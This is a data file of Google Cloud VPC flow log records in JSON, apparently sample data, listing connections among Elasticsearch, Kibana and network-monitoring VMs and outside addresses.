-{"insertId":"bxuq05fhgmw96","jsonPayload":{"bytes_sent":"28304484","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.212","src_port":39568},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:02.085146013Z","packets_sent":"2400","reporter":"DEST","rtt_msec":"15","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:40:00.480787267Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} -{"insertId":"bxuq05fhgmw99","jsonPayload":{"bytes_sent":"2962242","connection":{"dest_ip":"203.0.113.212","dest_port":39568,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:49:02.085146013Z","packets_sent":"1340","reporter":"SRC","rtt_msec":"15","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.480787267Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} -{"insertId":"bxuq05fhgmw93","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"192.0.2.117","dest_port":58026,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:49:09.114674887Z","packets_sent":"7","reporter":"SRC","rtt_msec":"40","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:49:08.995009558Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} -{"insertId":"bxuq05fhgmw9f","jsonPayload":{"bytes_sent":"9611","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33874},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:37.933323342Z","packets_sent":"101","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:20.510575555Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} -{"insertId":"bxuq05fhgmw9j","jsonPayload":{"bytes_sent":"318481","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33564},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.597223164Z","packets_sent":"181","reporter":"SRC","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.866699945Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} -{"insertId":"bxuq05fhgmw97","jsonPayload":{"bytes_sent":"139359","connection":{"dest_ip":"10.87.40.76","dest_port":33874,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:37.933323342Z","packets_sent":"70","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:20.510575555Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} -{"insertId":"bxuq05fhgmw9i","jsonPayload":{"bytes_sent":"1461","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"203.0.113.27","src_port":60640},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:42:50.942543211Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:42:50.830164366Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} -{"insertId":"bxuq05fhgmw9c","jsonPayload":{"bytes_sent":"45","connection":{"dest_ip":"198.51.100.182","dest_port":41818,"protocol":6,"src_ip":"10.139.99.242","src_port":22},"dest_location":{"asn":4837,"city":"Shangqiu","continent":"Asia","country":"chn","region":"Henan"},"end_time":"2019-06-14T03:43:16.809366809Z","packets_sent":"9","reporter":"SRC","rtt_msec":"1350","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:11.031370298Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} -{"insertId":"bxuq05fhgmw9h","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"203.0.113.27","dest_port":60640,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:42:50.942543211Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:42:50.830164366Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} -{"insertId":"bxuq05fhgmw92","jsonPayload":{"bytes_sent":"358920","connection":{"dest_ip":"10.87.40.76","dest_port":33966,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821302149Z","packets_sent":"61","reporter":"DEST","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:20.510534141Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} -{"insertId":"bxuq05fhgmw8u","jsonPayload":{"bytes_sent":"653827","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"198.51.100.88","src_port":53104},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:45.312543839Z","packets_sent":"286","reporter":"DEST","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"zeek-nsm","zone":"us-central1-a"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.188944581Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} -{"insertId":"bxuq05fhgmw9g","jsonPayload":{"bytes_sent":"5220","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33966},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821302149Z","packets_sent":"81","reporter":"SRC","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:20.510534141Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} -{"insertId":"bxuq05fhgmw91","jsonPayload":{"bytes_sent":"31140","connection":{"dest_ip":"10.87.40.76","dest_port":33524,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.461240929Z","packets_sent":"40","reporter":"DEST","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:24.789945697Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} -{"insertId":"bxuq05fhgmw95","jsonPayload":{"bytes_sent":"1610630","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"192.0.2.177","src_port":60126},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:52.101129310Z","packets_sent":"509","reporter":"DEST","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"suricata-iowa","zone":"us-central1-a"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:02.019841536Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} -{"insertId":"bxuq05fhgmw9a","jsonPayload":{"bytes_sent":"37145","connection":{"dest_ip":"198.51.100.88","dest_port":53104,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"zeek-nsm","zone":"us-central1-a"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:45.312543839Z","packets_sent":"158","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.188944581Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} -{"insertId":"198begsfh44xy3","jsonPayload":{"bytes_sent":"1460","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"203.0.113.12","src_port":53972},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:44:20.748121914Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:44:20.634231041Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"} -{"insertId":"198begsfh44xxt","jsonPayload":{"bytes_sent":"1458","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"192.0.2.117","src_port":58100},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:20.632737426Z","packets_sent":"7","reporter":"DEST","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:49:20.512264850Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"} -{"insertId":"198begsfh44xy8","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"192.0.2.117","dest_port":58100,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:49:20.632777660Z","packets_sent":"7","reporter":"SRC","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:49:20.512407536Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"} -{"insertId":"198begsfh44xy9","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"198.51.100.107","dest_port":60756,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:43:11.032929292Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:43:10.912193869Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"} -{"insertId":"198begsfh44xxr","jsonPayload":{"bytes_sent":"0","connection":{"dest_ip":"10.139.99.242","dest_port":22,"protocol":6,"src_ip":"198.51.100.182","src_port":14236},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:40:12.064908439Z","packets_sent":"3","reporter":"DEST","src_location":{"asn":4837,"city":"Shangqiu","continent":"Asia","country":"chn","region":"Henan"},"start_time":"2019-06-14T03:40:08.247072525Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"} -{"insertId":"198begsfh44xy2","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"203.0.113.27","dest_port":60122,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:41:39.207635184Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:41:39.087226326Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"} -{"insertId":"198begsfh44xy6","jsonPayload":{"bytes_sent":"1782","connection":{"dest_ip":"203.0.113.12","dest_port":53972,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:44:20.748121914Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:44:20.634231041Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"} -{"insertId":"198begsfh44xxx","jsonPayload":{"bytes_sent":"68545","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33530},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:52.205089801Z","packets_sent":"368","reporter":"DEST","rtt_msec":"163","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.140301693Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"} -{"insertId":"198begsfh44xy4","jsonPayload":{"bytes_sent":"74613","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.58","src_port":65274},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.220838853Z","packets_sent":"745","reporter":"DEST","rtt_msec":"209","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:40:01.270996793Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"} -{"insertId":"198begsfh44xy1","jsonPayload":{"bytes_sent":"74942","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.58","src_port":53879},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.312105537Z","packets_sent":"726","reporter":"DEST","rtt_msec":"176","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:40:00.760414869Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"} -{"insertId":"198begsfh44xxp","jsonPayload":{"bytes_sent":"1467","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"203.0.113.27","src_port":34450},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:47:38.299054333Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:47:38.189569840Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"} -{"insertId":"198begsfh44xxv","jsonPayload":{"bytes_sent":"121593","connection":{"dest_ip":"203.0.113.58","dest_port":65274,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.220838853Z","packets_sent":"610","reporter":"SRC","rtt_msec":"209","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.270996793Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"} -{"insertId":"198begsfh44xy7","jsonPayload":{"bytes_sent":"1464","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"203.0.113.27","src_port":60968},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:43:39.777977145Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:43:39.653136947Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"} -{"insertId":"198begsfh44xxs","jsonPayload":{"bytes_sent":"177471","connection":{"dest_ip":"203.0.113.134","dest_port":33530,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:52.205194199Z","packets_sent":"246","reporter":"SRC","rtt_msec":"163","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.140301693Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"} -{"insertId":"198begsfh44xxq","jsonPayload":{"bytes_sent":"53315","connection":{"dest_ip":"203.0.113.58","dest_port":65275,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.316847800Z","packets_sent":"588","reporter":"SRC","rtt_msec":"82","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.565734921Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03